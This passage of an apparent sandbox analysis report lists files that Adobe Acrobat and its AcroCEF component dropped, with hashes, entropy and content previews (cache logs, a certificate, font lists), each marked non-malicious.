                  SHA-256:0FA5F5551DC0D456BD36F36DD97291E3FD811C0D1827307CEF946805010651E6
                  SHA-512:DC43D75B3B99BCE51ADB002E77198B98FEADE9FD2536F09820E6BB891D3262283C7B58F62478CD0FC32B3E456D3999A5F230F0FD301260489E7CC60B569BB61D
                  Malicious:false
                  Preview:PyD......................................;...{.......};..!...{?..........!...{?..!...{?..g...!...{?.................+.;5.....};.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):298
                  Entropy (8bit):5.125469598198987
                  Encrypted:false
                  SSDEEP:6:iOK5q2PN72nKuAl9OmbnIFUtwJivZZmweJivzkwON72nKuAl9OmbjLJ:7K5vVaHAahFUtwJiZ/eJiz5OaHAaSJ
                  MD5:8D4AA9085634531B8193DF93B600B7FA
                  SHA1:0633A1C72A5A3503AB780F311A51C5946D639F36
                  SHA-256:0E563FF5CA08BD89667257983AA32C62A2D1DB5FF83811F2430EDE41C1CBC097
                  SHA-512:6C8B98451E86604AC48627A4F0802218598D6A5B8C45B912D76215C6D39365C2523B98395A527A4E5CDCFBA3C7477B217B47C8F937867030C65E4F9F33D49250
                  Malicious:false
                  Preview:2025/01/13-04:13:25.429 11c0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/13-04:13:25.432 11c0 Recovering log #3.2025/01/13-04:13:25.432 11c0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):298
                  Entropy (8bit):5.125469598198987
                  Encrypted:false
                  SSDEEP:6:iOK5q2PN72nKuAl9OmbnIFUtwJivZZmweJivzkwON72nKuAl9OmbjLJ:7K5vVaHAahFUtwJiZ/eJiz5OaHAaSJ
                  MD5:8D4AA9085634531B8193DF93B600B7FA
                  SHA1:0633A1C72A5A3503AB780F311A51C5946D639F36
                  SHA-256:0E563FF5CA08BD89667257983AA32C62A2D1DB5FF83811F2430EDE41C1CBC097
                  SHA-512:6C8B98451E86604AC48627A4F0802218598D6A5B8C45B912D76215C6D39365C2523B98395A527A4E5CDCFBA3C7477B217B47C8F937867030C65E4F9F33D49250
                  Malicious:false
                  Preview:2025/01/13-04:13:25.429 11c0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/13-04:13:25.432 11c0 Recovering log #3.2025/01/13-04:13:25.432 11c0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):342
                  Entropy (8bit):5.179663057918421
                  Encrypted:false
                  SSDEEP:6:iOKOVT+q2PN72nKuAl9Ombzo2jMGIFUtwOc1ZmweOXTVkwON72nKuAl9Ombzo2jz:7KOVqvVaHAa8uFUtwO6/eOJ5OaHAa8RJ
                  MD5:7B3A1FFB03BD00F4A7465EBF02628C02
                  SHA1:0719F2794768D6BD4DE30C774E8F9ECC89FBC73B
                  SHA-256:F6555959DB85284819D7D3ACF76E034EC986614AB46C7C6C99F0B74863E924B9
                  SHA-512:E1D9F809CA23FCCECF65960F49231CB6FD08B00A2B6B7E4AD902A110DF2425A0F139EA2228802B9E2356ACB42B45D3685DF48057BF33750972EB2FC85360AEAD
                  Malicious:false
                  Preview:2025/01/13-04:13:25.970 1218 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/13-04:13:25.971 1218 Recovering log #3.2025/01/13-04:13:25.972 1218 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):342
                  Entropy (8bit):5.179663057918421
                  Encrypted:false
                  SSDEEP:6:iOKOVT+q2PN72nKuAl9Ombzo2jMGIFUtwOc1ZmweOXTVkwON72nKuAl9Ombzo2jz:7KOVqvVaHAa8uFUtwO6/eOJ5OaHAa8RJ
                  MD5:7B3A1FFB03BD00F4A7465EBF02628C02
                  SHA1:0719F2794768D6BD4DE30C774E8F9ECC89FBC73B
                  SHA-256:F6555959DB85284819D7D3ACF76E034EC986614AB46C7C6C99F0B74863E924B9
                  SHA-512:E1D9F809CA23FCCECF65960F49231CB6FD08B00A2B6B7E4AD902A110DF2425A0F139EA2228802B9E2356ACB42B45D3685DF48057BF33750972EB2FC85360AEAD
                  Malicious:false
                  Preview:2025/01/13-04:13:25.970 1218 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/13-04:13:25.971 1218 Recovering log #3.2025/01/13-04:13:25.972 1218 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):475
                  Entropy (8bit):4.953999074856088
                  Encrypted:false
                  SSDEEP:12:YH/um3RA8sq1pShsBdOg2HHcaq3QYiubcP7E4T3y:Y2sRdsypSydMHm3QYhbA7nby
                  MD5:075A694CAA0CBDE34ED69555CCD2DDD4
                  SHA1:343A5C3B2D79BC576B5A319F74138D775B7486FE
                  SHA-256:04332A1CB60A010BE1E5D8CE93FF74C1500C32F46715895AA52A8D4C481BE07E
                  SHA-512:B6FF665E26477B8EA210B7D8B0AB9C81504542D87284967669951E1ABA07B7A7570B6723B97CC0443AF0E0353C01886341ABAF7A3D78EE09ED7FABF85D3CCB9D
                  Malicious:false
                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381319617132946","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":132698},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:JSON data
                  Category:modified
                  Size (bytes):475
                  Entropy (8bit):4.953999074856088
                  Encrypted:false
                  SSDEEP:12:YH/um3RA8sq1pShsBdOg2HHcaq3QYiubcP7E4T3y:Y2sRdsypSydMHm3QYhbA7nby
                  MD5:075A694CAA0CBDE34ED69555CCD2DDD4
                  SHA1:343A5C3B2D79BC576B5A319F74138D775B7486FE
                  SHA-256:04332A1CB60A010BE1E5D8CE93FF74C1500C32F46715895AA52A8D4C481BE07E
                  SHA-512:B6FF665E26477B8EA210B7D8B0AB9C81504542D87284967669951E1ABA07B7A7570B6723B97CC0443AF0E0353C01886341ABAF7A3D78EE09ED7FABF85D3CCB9D
                  Malicious:false
                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381319617132946","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":132698},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5449
                  Entropy (8bit):5.251856330495474
                  Encrypted:false
                  SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE75DlH:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhb
                  MD5:98AA045081330154200DF4781B4AF506
                  SHA1:180983EF6F9EDA343CEB4F76A1A70D9359073FC8
                  SHA-256:2DCC4C6F4C34119098527323D4B9EC7B75DF192F39B4896C58AB7FD473296C22
                  SHA-512:348F5C427F904B7A409C136703EC7C6A400E4442B4EE0979DD28D39695645740B3BA9AD69E9C778124A526EC9BFAEA86EFCF55B13653CD68F14FE9E28C5D41CB
                  Malicious:false
                  Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):5.1741616807262325
                  Encrypted:false
                  SSDEEP:6:iOKYQ+q2PN72nKuAl9OmbzNMxIFUtwYeXZmweDEtVkwON72nKuAl9OmbzNMFLJ:7K2vVaHAa8jFUtw1/eU5OaHAa84J
                  MD5:C9E34FBA354804AB3A5D9C24F7227A42
                  SHA1:74A0B527AE74A0CD2676954D127652C22D6FA598
                  SHA-256:25948D77E6D64DBA7951849656CD88A701BF913F4AD850B853AFEB5E59BEBEBF
                  SHA-512:7EBF0C5FC8F82EBB670840F5FE4E3B549DDD491360CA38936AD819F38250DD67A24BE47CBE69965831C0971D558362DD5CCF284F6AF55BEAD283C323469F1DCC
                  Malicious:false
                  Preview:2025/01/13-04:13:26.073 1218 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/13-04:13:26.075 1218 Recovering log #3.2025/01/13-04:13:26.087 1218 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):5.1741616807262325
                  Encrypted:false
                  SSDEEP:6:iOKYQ+q2PN72nKuAl9OmbzNMxIFUtwYeXZmweDEtVkwON72nKuAl9OmbzNMFLJ:7K2vVaHAa8jFUtw1/eU5OaHAa84J
                  MD5:C9E34FBA354804AB3A5D9C24F7227A42
                  SHA1:74A0B527AE74A0CD2676954D127652C22D6FA598
                  SHA-256:25948D77E6D64DBA7951849656CD88A701BF913F4AD850B853AFEB5E59BEBEBF
                  SHA-512:7EBF0C5FC8F82EBB670840F5FE4E3B549DDD491360CA38936AD819F38250DD67A24BE47CBE69965831C0971D558362DD5CCF284F6AF55BEAD283C323469F1DCC
                  Malicious:false
                  Preview:2025/01/13-04:13:26.073 1218 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/13-04:13:26.075 1218 Recovering log #3.2025/01/13-04:13:26.087 1218 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 13, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 13
                  Category:dropped
                  Size (bytes):86016
                  Entropy (8bit):4.444807367163343
                  Encrypted:false
                  SSDEEP:384:Setci5tNiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Bms3OazzU89UTTgUL
                  MD5:768714D9A7BCE9824F77E1421AD7F208
                  SHA1:57821457AF8E115D2AA3037DAFF449AE8EA875D8
                  SHA-256:207F68495AB8E3FF2FAAB9937ABAF962F6F6254D56549933195E1BAA5B659766
                  SHA-512:82919A40B6DDA451671F26911065F3F6B5F7BCA7AFD1CBA8040029DD09F7D39F1E77DA547458ACF8B4C4E67A735480415A927CAA86D1869D3FA769B5281AB2FE
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite Rollback Journal
                  Category:dropped
                  Size (bytes):8720
                  Entropy (8bit):2.2129558282551476
                  Encrypted:false
                  SSDEEP:24:7+tcqenuwKdqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9z:7MUnCdqPmFTIF3XmHjBoGGR+jMz+LhF
                  MD5:43155FB3F6BA7F43E95B46CCC20B70BA
                  SHA1:3CE314A7208ADD84636EE463DCE761403630A3A8
                  SHA-256:5DB3B96EDBF2D4A4D1DCA603DACA927CFFABBC0DCF5932D175D3C02073392C03
                  SHA-512:4213ADF874865E7FDFF2D2AD79B0D627CA78FCF11B1531F4D2BB22790491A34AE768802A09744C5BB054F45DED4E32B6EEE2E3D7AA4F8810A4B64B1F73B8C04F
                  Malicious:false
                  Preview:.... .c.....,...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:Certificate, Version=3
                  Category:dropped
                  Size (bytes):1391
                  Entropy (8bit):7.705940075877404
                  Encrypted:false
                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                  Malicious:false
                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                  Category:dropped
                  Size (bytes):71954
                  Entropy (8bit):7.996617769952133
                  Encrypted:true
                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                  Malicious:false
                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):192
                  Entropy (8bit):2.7126816513205103
                  Encrypted:false
                  SSDEEP:3:kkFkly3KRllltfllXlE/HT8kkDJ1NNX8RolJuRdxLlGB9lQRYwpDdt:kKr3CteT8f7NMa8RdWBwRd
                  MD5:6773B6B4EB13619EB0CDB556DD743B15
                  SHA1:605241503CC73B1511BCD7941895CDAF445AD412
                  SHA-256:679855350E8747FD56AB9763D881B69AE947E79165FB7F7A6E96DDD8646856FE
                  SHA-512:60B2BC5A12BC72F0C5F0D41F807F7D15CC78FB65F2E8977DC5F66519B37DAA594C2896FB722EB0F6000B0B068D2B9A2C40DD460DE80FB423DFD314423E247940
                  Malicious:false
                  Preview:p...... .........R^k.e..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):328
                  Entropy (8bit):3.1321959448363517
                  Encrypted:false
                  SSDEEP:6:kKxgPL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:uPiDnLNkPlE99SNxAhUe/3
                  MD5:BC4CA58BE730AFE884116DC9CCE46A6D
                  SHA1:23FF87269AA3D99B2A6685FAE9B70B66487AE92F
                  SHA-256:A8E3BBE63CA7BBE7B1403DA05618B381CC448B79AB0BAAF4588308E585D56A01
                  SHA-512:9113EF485B7FA68C4A1093BFD9844CCDD9448EA8529ED91341D6B28C663AC0643E5FC16CB10EEEBA84E86CE8079F2FA8CE5D967638A9924162CCF9491F86FE54
                  Malicious:false
                  Preview:p...... .........3.}.e..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):1233
                  Entropy (8bit):5.233980037532449
                  Encrypted:false
                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                  Malicious:false
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):1233
                  Entropy (8bit):5.233980037532449
                  Encrypted:false
                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                  Malicious:false
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):1233
                  Entropy (8bit):5.233980037532449
                  Encrypted:false
                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                  Malicious:false
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):10880
                  Entropy (8bit):5.214360287289079
                  Encrypted:false
                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                  MD5:B60EE534029885BD6DECA42D1263BDC0
                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                  Malicious:false
                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PostScript document text
                  Category:dropped
                  Size (bytes):10880
                  Entropy (8bit):5.214360287289079
                  Encrypted:false
                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                  MD5:B60EE534029885BD6DECA42D1263BDC0
                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
